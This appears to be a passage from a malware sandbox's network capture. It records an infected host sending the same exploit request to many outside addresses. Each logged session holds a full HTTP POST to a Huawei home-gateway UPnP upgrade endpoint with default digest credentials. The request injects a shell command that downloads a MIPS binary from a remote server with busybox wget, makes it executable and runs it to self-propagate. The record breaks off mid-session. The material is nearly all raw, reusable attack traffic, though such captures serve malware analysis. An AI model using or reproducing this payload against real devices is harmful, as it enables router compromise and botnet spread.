                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1612192.168.2.2335420197.15.166.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498806953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1613192.168.2.235317084.163.146.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498806953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1614192.168.2.2349446197.174.255.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498859882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1615192.168.2.2352366157.85.56.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498893023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1616192.168.2.235702041.76.132.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498920918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1617192.168.2.235031441.72.49.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499732971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1618192.168.2.2334580157.20.51.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499744892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1619192.168.2.2340342197.165.239.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499811888 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1620192.168.2.2351344222.165.225.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499847889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1621192.168.2.2353926157.186.117.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499881029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1622192.168.2.2337784157.250.101.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.499967098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
